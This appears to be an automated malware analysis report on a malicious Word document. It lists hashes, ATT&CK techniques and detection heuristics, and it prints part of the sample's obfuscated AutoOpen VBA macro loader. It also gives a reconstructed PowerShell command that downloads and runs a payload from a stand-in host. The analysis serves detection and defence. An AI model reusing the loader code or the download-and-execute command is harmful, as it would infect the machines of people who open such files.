Office (OLE) malware analysis — malicious · 2499f8a8e36f20bb

MALICIOUS

Office (OLE)

238.8 KB Created: 2018-07-05 19:38:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: cf125b00cb644104c6828bd18901619c SHA-1: 4bc87935d55ee82132f5d71fb71c1b9ad2abed3e SHA-256: 2499f8a8e36f20bb94a0c3c3d63fd5fdaecf95261004ca6f88dcb9c4ea943f8c

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample is a malicious Office document containing an AutoOpen VBA macro. This macro is obfuscated and uses CreateObject and Shell calls. It constructs and executes a PowerShell command to download and execute a second-stage payload from a remote URL. The reconstructed PowerShell command is: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')".

Heuristics 8

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12611 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12611 bytes
SHA-256: `81bb4d86bbb1509cfd320c08bb6daff1568d7a162884460d1a71368292ab3b79`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iiidmNjsNizdW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next RMzKhI = (68616 / UijzlJ / 40945 / GrMSVH - 37514 * LDaClj / 11160 - PoiACm) QQhhdP = (75420 / junvsd / 54586 / sQwdi - 63798 * kcIhz / 60842 - qUbaC) FwQaWq = (92086 / hmLUH / 72665 / mDiPwE - 38886 * pUKDTU / 35121 - YjGLCN) SHQYwCqd (BzocWZIWtbS + WGXFRisUOrj + EWCRYjJZaso + MllEfLX) oSbvl = (22006 / FfoXT / 79009 / hlNaFL - 73637 * pPKnkA / 51222 - ZuYDHl) DIzwoj = (90117 / jFZZo / 74160 / zZMdL - 69969 * bNitPc / 91696 - WvsbXw) End Sub Attribute VB_Name = "nJUDEiaBzmrYi" Function BzocWZIWtbS() On Error Resume Next EcNow = TkdiG - 29262 - (18441 * 57898 * bkcZwK / lorhj) rfljj = 92934 * DjIZB * (29137 / nGdqtv) kzDXo = ISszBk - 93239 - (59130 * 81773 * zdJZBG / Vhsir) GUJFKwjfFm = "wershell" + " " + " " + " [" + "StrIng" + "]::joI" + "n" + Chr(40) + "''," + Chr(40) + "[" + "cHAR[]]" + Chr(40) + "20, 1" + "15, 95,9" + "7, 13 ,9" vsRuvj = CclHs - 16527 - (17228 * 12321 * tNozS / swiEMM) mhTti = rVDYI - 85498 - (55536 * 46749 * Nqutr / ZLOii) PAUAZ = GOwtJ - 23488 - (70503 * 10178 * AjuTLV / tkYQz) obsHtKQVDsH = "4 , 85," + "71 , 2" + "9 ,9" + "5,82," + " 90 , 8" + "5 ,83 , 6" JLlwFW = fMjjd - 52532 - (20283 * 46477 * qzwwS / MMlWE) WCjYWG = Ijvtf - 32555 - (90978 * 76425 * umJdV / tKjzH) Fihiwajj = "8 , 16" + " ,126" + " , 85," + "68, 30" + " ,103,85," + "82 ,115 " + ", 92,89 ," + "85, 94,68" + ", 11 , " + "20, 66 " ZzCapM = iadRn - 50922 - (57438 * 46906 * tMLHc / mwsrU) kiCFU = aiJtz - 34034 - (78549 * 85299 * XCBdz / mQdjN) RwJXMj = vkoJJo - 48525 - (31620 * 83611 * Jjkcwo / vXqzVm) Xznfak = jLZja - 65664 - (7092 * 55433 * tIUst / InKnwZ) TbHiRK = vKwXjj - 68422 - (22294 * 68435 * SApqb / VKjco) DDSRiqPEOi = ", 103 ,12" + "0, 13" + ",23," + " 88, " + "68 , 68 ," + " 64, " + "10, 31 " + ", 31 " oFuqLz = JvURV - 89806 - (52921 * 21819 * QEHPWM / BswIhi) GBQYb = HliCcI - 40325 - (90823 * 46309 * ZCzQtZ / vjrHB) hzsfJ = uPhGFz - 55402 - (69273 * 35080 * pnKPZ / qqoVwS) rcpLzE = EIWFDJ - 14753 - (75481 * 33072 * vSpvv / IchpU) cbVRCc = ", 1 ,1" + " , 2, 3" + "0 , " + "1,9," + " 6 ,30 , " + "4 ,2, 3" + "0,1,8 ," + "0, 31," qladF = KXtLj - 96465 - (16550 * 38443 * KNkdS / QjwBiz) LXizJ = wnwLz - 97336 - (45827 * 49691 * szmQk / dNbXs) GcQUj = NkWtTP - 56855 - (98500 * 72009 * SbsMC / nPfUa) WdwXDI = "64 ,66, " + "95 , 90" + ", 85, 83 " + ",68,6" + "7, 31 " + ", 68 ," aEbNmj = dcWCa - 82839 - (81833 * 20809 * RQwqj / HVGro) GVVpGz = "81 , 68," + " 81 ," + "93 ,89, 3" + "1,68, 81," + " 68 , 81 " + ",93 , 89" + " , 31 ,9" + "6 ,66 , " + "121 ,98" + ",68,10" + "6, 8 ,31 " + ",112, 88 " GvvPo = zqUwX - 93464 - (29513 * 3150 * wBuCk / iUszN) XMFuS = nQMBp - 78227 - (99526 * 42978 * cXwEc / JDosY) rdjrm = ", 68, 6" + "8 ,64 " + ", 10" + " , 31 ," + " 31 ,71, " + "71 , 7" BzocWZIWtbS = GUJFKwjfFm + obsHtKQVDsH + Fihiwajj + DDSRiqPEOi + cbVRCc + WdwXDI + GVVpGz + rdjrm RCuQh = RGZAk - 43992 - (38745 * 15459 * YHMAEG / zVNuca) End Function Function WGXFRisUOrj() On Error Resume Next iIIjqr = kwUdsh - 27661 - (42961 * 99256 * UMOFul / GohYLj) oYFUw = WjPlCX - 16485 - (50187 * 38990 * hjmpH / rnXPa) qDHYil = FjvbfI - 33001 - (31451 * 22806 * CzDGh / cbvciY) FlhDud = hrnqbu - 36092 - (26657 * 82878 * tTpAJ / CiEZD) cuKzm = WocER - 25085 - (45400 * 27111 * ArmSB / EibJT) GJDaMNpmUX = "1, 30,93" + " ,81 ,66" + ", 83,69 " + ", 67" + " ,68 ,66 " + ",95 ," + "73,30," + " 83, 95," KUWoMn = wVMzjf - 65456 - (83677 * 52311 * WvJiu / jkvShz) YPjJEI = BDEzf - 98380 - (39867 * 84945 * kfUZq / wwMXhR) qEWtdJ = HEVlK - 15893 - (51153 * 19261 * OHlFKW / CPmnER) KtcirzAz = "93 , 31, " + "94,86 " + ",92 " + ",29 ,9" + "4 ,89,91," + " 85,2" + "9 ,86" qjLkV = Rhnas - 36358 - (96337 ... (truncated)

SHA-256: 81bb4d86bbb1509cfd320c08bb6daff1568d7a162884460d1a71368292ab3b79

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iiidmNjsNizdW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   RMzKhI = (68616 / UijzlJ / 40945 / GrMSVH - 37514 * LDaClj / 11160 - PoiACm)
   QQhhdP = (75420 / junvsd / 54586 / sQwdi - 63798 * kcIhz / 60842 - qUbaC)
   FwQaWq = (92086 / hmLUH / 72665 / mDiPwE - 38886 * pUKDTU / 35121 - YjGLCN)
SHQYwCqd (BzocWZIWtbS + WGXFRisUOrj + EWCRYjJZaso + MllEfLX)
   oSbvl = (22006 / FfoXT / 79009 / hlNaFL - 73637 * pPKnkA / 51222 - ZuYDHl)
   DIzwoj = (90117 / jFZZo / 74160 / zZMdL - 69969 * bNitPc / 91696 - WvsbXw)
End Sub


Attribute VB_Name = "nJUDEiaBzmrYi"
Function BzocWZIWtbS()
On Error Resume Next
EcNow = TkdiG - 29262 - (18441 * 57898 * bkcZwK / lorhj)
   rfljj = 92934 * DjIZB * (29137 / nGdqtv)
   kzDXo = ISszBk - 93239 - (59130 * 81773 * zdJZBG / Vhsir)
GUJFKwjfFm = "wershell" + "       " + "       " + "     [" + "StrIng" + "]::joI" + "n" + Chr(40) + "''," + Chr(40) + "[" + "cHAR[]]" + Chr(40) + "20, 1" + "15, 95,9" + "7, 13 ,9"
vsRuvj = CclHs - 16527 - (17228 * 12321 * tNozS / swiEMM)
   mhTti = rVDYI - 85498 - (55536 * 46749 * Nqutr / ZLOii)
   PAUAZ = GOwtJ - 23488 - (70503 * 10178 * AjuTLV / tkYQz)
obsHtKQVDsH = "4 , 85," + "71 , 2" + "9 ,9" + "5,82," + " 90 , 8" + "5 ,83 , 6"
JLlwFW = fMjjd - 52532 - (20283 * 46477 * qzwwS / MMlWE)
   WCjYWG = Ijvtf - 32555 - (90978 * 76425 * umJdV / tKjzH)
Fihiwajj = "8 , 16" + " ,126" + " , 85," + "68, 30" + " ,103,85," + "82 ,115 " + ", 92,89 ," + "85, 94,68" + ", 11 , " + "20, 66 "
ZzCapM = iadRn - 50922 - (57438 * 46906 * tMLHc / mwsrU)
   kiCFU = aiJtz - 34034 - (78549 * 85299 * XCBdz / mQdjN)
   RwJXMj = vkoJJo - 48525 - (31620 * 83611 * Jjkcwo / vXqzVm)
   Xznfak = jLZja - 65664 - (7092 * 55433 * tIUst / InKnwZ)
   TbHiRK = vKwXjj - 68422 - (22294 * 68435 * SApqb / VKjco)
DDSRiqPEOi = ", 103 ,12" + "0, 13" + ",23," + " 88, " + "68 , 68 ," + " 64, " + "10, 31 " + ", 31 "
oFuqLz = JvURV - 89806 - (52921 * 21819 * QEHPWM / BswIhi)
   GBQYb = HliCcI - 40325 - (90823 * 46309 * ZCzQtZ / vjrHB)
   hzsfJ = uPhGFz - 55402 - (69273 * 35080 * pnKPZ / qqoVwS)
   rcpLzE = EIWFDJ - 14753 - (75481 * 33072 * vSpvv / IchpU)
cbVRCc = ", 1 ,1" + " , 2, 3" + "0 , " + "1,9," + " 6 ,30 , " + "4 ,2, 3" + "0,1,8 ," + "0, 31,"
qladF = KXtLj - 96465 - (16550 * 38443 * KNkdS / QjwBiz)
   LXizJ = wnwLz - 97336 - (45827 * 49691 * szmQk / dNbXs)
   GcQUj = NkWtTP - 56855 - (98500 * 72009 * SbsMC / nPfUa)
WdwXDI = "64 ,66, " + "95 , 90" + ", 85, 83 " + ",68,6" + "7, 31 " + ", 68 ,"
aEbNmj = dcWCa - 82839 - (81833 * 20809 * RQwqj / HVGro)
GVVpGz = "81 , 68," + " 81 ," + "93 ,89, 3" + "1,68, 81," + " 68 , 81 " + ",93 , 89" + " , 31 ,9" + "6 ,66 , " + "121 ,98" + ",68,10" + "6, 8 ,31 " + ",112, 88 "
GvvPo = zqUwX - 93464 - (29513 * 3150 * wBuCk / iUszN)
   XMFuS = nQMBp - 78227 - (99526 * 42978 * cXwEc / JDosY)
rdjrm = ", 68, 6" + "8 ,64 " + ", 10" + " , 31 ," + " 31 ,71, " + "71 , 7"
BzocWZIWtbS = GUJFKwjfFm + obsHtKQVDsH + Fihiwajj + DDSRiqPEOi + cbVRCc + WdwXDI + GVVpGz + rdjrm
   RCuQh = RGZAk - 43992 - (38745 * 15459 * YHMAEG / zVNuca)
End Function
Function WGXFRisUOrj()
On Error Resume Next
iIIjqr = kwUdsh - 27661 - (42961 * 99256 * UMOFul / GohYLj)
   oYFUw = WjPlCX - 16485 - (50187 * 38990 * hjmpH / rnXPa)
   qDHYil = FjvbfI - 33001 - (31451 * 22806 * CzDGh / cbvciY)
   FlhDud = hrnqbu - 36092 - (26657 * 82878 * tTpAJ / CiEZD)
   cuKzm = WocER - 25085 - (45400 * 27111 * ArmSB / EibJT)
GJDaMNpmUX = "1, 30,93" + " ,81 ,66" + ", 83,69 " + ", 67" + " ,68 ,66 " + ",95 ," + "73,30," + " 83, 95,"
KUWoMn = wVMzjf - 65456 - (83677 * 52311 * WvJiu / jkvShz)
   YPjJEI = BDEzf - 98380 - (39867 * 84945 * kfUZq / wwMXhR)
   qEWtdJ = HEVlK - 15893 - (51153 * 19261 * OHlFKW / CPmnER)
KtcirzAz = "93 , 31, " + "94,86 " + ",92 " + ",29 ,9" + "4 ,89,91," + " 85,2" + "9 ,86"
qjLkV = Rhnas - 36358 - (96337
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.